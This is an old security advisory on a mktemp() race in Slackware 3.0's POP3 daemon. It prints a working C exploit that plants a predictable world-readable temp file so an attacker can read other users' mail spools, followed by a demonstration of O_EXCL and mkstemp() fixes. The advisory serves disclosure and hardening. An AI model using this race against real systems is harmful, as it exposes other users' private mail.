COMMAND

    /usr/sbin/in.pop3d

SYSTEMS AFFECTED

    Slackware 3.0 Linux with pop3d enabled

PROBLEM

    As explained earlier in the mailx vulnerability post for Linux, the
    way many programs use mktemp() is a problem.  This is a follow-up to
    that post, demonstrating the generic denial-of-service attack and a
    race-condition attack against the POP3 mail daemon shipped with
    Slackware 3.0 Linux.  Refer to the original mailx post for the
    security concerns with the use of mktemp().

    Linux's /usr/sbin/in.pop3d contains a mktemp() race condition.  It is
    exploitable when a POP client connects to the machine, at the point
    where the user's correct password is entered: the daemon then dumps
    that user's mail spool into a temporary file in /tmp.  Winning the
    race lets you read the contents of the mail spool of any user who
    connects with a POP client.  The author of the following exploit is
    Dave M. (davem@cmu.edu).

    The attack exploits the predictability of the names mktemp() returns.
    mktemp() only picks a name that does not exist at the time of the
    call; the program creates the file itself some time later.  An
    attacker who creates the file in that gap, after the name has been
    determined but before pop3d creates it, owns the file and can
    therefore read the mail that pop3d then dumps into it.

pop3d-exploit.c:

    /* This program creates temporary files used by in.pop3d (/usr/sbin/in.pop3d
       under Slackware 3.0), which can then be read by the program.  This
       race condition is NOT always successful; it may take extreme
       conditions to ensure a high probability of success.

       Dave M. (davem@cmu.edu)
     */

    #include <stdio.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>

    int main(int argc, char **argv)
    {
      int race;                    /* fd of the file we plant */
      int i;
      char tmpf[80];               /* holds the predicted filename */

      umask(0);                    /* keep the planted file world-readable */

      if(argc<2)                   /* the pid of the in.pop3d process is required */
        {
          printf("pop3 racer\nSyntax: %s process-id\n",argv[0]);
          return -1;
        }

      /* Predict the name mktemp("/tmp/pop3XXXXXX") will choose in the old
         libc: "/tmp/pop3", then the letter 'a', then the pid padded with
         leading zeros to five digits.  tmpf[9] is the first 'X'. */
      strcpy(tmpf,"/tmp/pop3");
      for(i=strlen(argv[1]);i<6;i++)
        strcat(tmpf,"0");
      strcat(tmpf,argv[1]);
      tmpf[9] = 'a';

      /* Plant the file, mode 0666, so we can read whatever pop3d dumps into it. */
      race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
      if(race < 0)
        {
          perror(tmpf);
          return -1;
        }

      /* Flip the file in and out of place as fast as possible: mktemp() must
         find the name free (otherwise it returns a different name), but the
         open() that follows must find our file.  If the rename back fails,
         pop3d created the file itself while ours was moved aside and this
         attempt is lost. */
      while(1)
        {
          rename(tmpf,"/tmp/pop.exploit");
          if(rename("/tmp/pop.exploit",tmpf) < 0)
            {
              printf("race lost - file created.\n"); /* catch 1/2 the losses */
              break;
            }
        }
      return 0;
    }
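
    The gap described above, as an added illustration that is not part of
    the original advisory and not in.pop3d's source: a victim chooses a
    predictable name and then opens it, an attacker who always wins the
    timing plants the file in between, and the same run is repeated with
    O_CREAT|O_EXCL, which refuses the planted file.  The name scheme
    "/tmp/pop3" + 'a' + zero-padded pid is assumed from what
    pop3d-exploit.c builds, the spool line is constructed sample data,
    and the function names are this example's own.  mkstemp_mode() shows
    the proper replacement, mkstemp(), which chooses and creates the name
    in one step.

```c
/* Added illustration, not in.pop3d's code: the mktemp()-then-open() gap,
   run with the attacker always winning the timing, beside the O_EXCL
   form and mkstemp() that close it.  Name scheme assumed from
   pop3d-exploit.c; SPOOL_SAMPLE is constructed sample data. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define SPOOL_SAMPLE "From alice Mon Jan  1 00:00 1996\nSubject: constructed\n"

/* Victim step 1: the old libc mktemp() filled XXXXXX with a letter plus
   the pid, so the name can be predicted (assumed scheme). */
static void predictable_name(char *buf, size_t len, pid_t pid)
{
    snprintf(buf, len, "/tmp/pop3a%05ld", (long)pid);
}

/* Attacker: create the file between name selection and the daemon's
   open(), world-readable so its contents can be read back afterwards. */
static int attacker_plant(const char *name)
{
    int fd = open(name, O_WRONLY | O_CREAT, 0666);
    if (fd < 0)
        return -1;
    return close(fd);
}

/* Victim step 2, vulnerable: what fopen(name, "w") does.  Without O_EXCL
   an existing file is silently truncated and reused. */
static int victim_open_unsafe(const char *name)
{
    return open(name, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Victim step 2, hardened: O_EXCL makes creation fail with EEXIST when
   someone got there first, so a planted file is never written to. */
static int victim_open_safe(const char *name)
{
    return open(name, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Attacker: read back what the daemon wrote; 1 if the sample spool line
   was captured, 0 otherwise. */
static int attacker_read(const char *name)
{
    char buf[256] = {0};
    int fd = open(name, O_RDONLY);
    if (fd < 0)
        return 0;
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    return n > 0 && strcmp(buf, SPOOL_SAMPLE) == 0;
}

/* One race with the attacker winning the timing.  Returns 1 if the spool
   leaked into the attacker's file, 0 if the daemon refused, -1 on an
   unrelated error. */
int race_demo(int hardened)
{
    char name[64];
    int fd, leaked = 0;

    predictable_name(name, sizeof name, getpid());
    unlink(name);                       /* start from a clean slate */
    if (attacker_plant(name) != 0)
        return -1;

    fd = hardened ? victim_open_safe(name) : victim_open_unsafe(name);
    if (fd >= 0) {                      /* daemon dumps the spool */
        if (write(fd, SPOOL_SAMPLE, strlen(SPOOL_SAMPLE)) < 0)
            leaked = -1;
        close(fd);
        if (leaked == 0)
            leaked = attacker_read(name);
    } else if (errno != EEXIST) {
        leaked = -1;
    }
    unlink(name);
    return leaked;
}

/* The real fix: mkstemp() picks the name and creates the file in one step
   with O_EXCL semantics and mode 0600 (umask permitting).  Returns the
   permission bits of the file it created. */
int mkstemp_mode(void)
{
    char tmpl[] = "/tmp/pop3XXXXXX";
    struct stat st;
    int fd = mkstemp(tmpl);
    if (fd < 0 || fstat(fd, &st) != 0)
        return -1;
    close(fd);
    unlink(tmpl);
    return (int)(st.st_mode & 0777);
}

int main(void)
{
    printf("plain open(): spool %s\n", race_demo(0) == 1 ? "leaked" : "kept");
    printf("O_EXCL open(): spool %s\n", race_demo(1) == 1 ? "leaked" : "kept");
    printf("mkstemp() file mode: %04o\n", mkstemp_mode());
    return 0;
}
```

    Build with cc -Wall.  The plain open() reports the spool leaked, the
    O_EXCL open() reports it kept, and the mkstemp() file comes back as
    0600.  Note that a hand-rolled O_EXCL open still has to retry with a
    fresh name on EEXIST; mkstemp() does that loop for you.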

SOLUTION

    A temporary workaround is to disable pop3d (comment its line out of
    /etc/inetd.conf and restart inetd) if you find yourself vulnerable.
    In any case you should upgrade your software: the underlying fix is
    for the daemon to create its spool copy atomically with mkstemp(), or
    open() with O_CREAT|O_EXCL, instead of mktemp() followed by a separate
    open().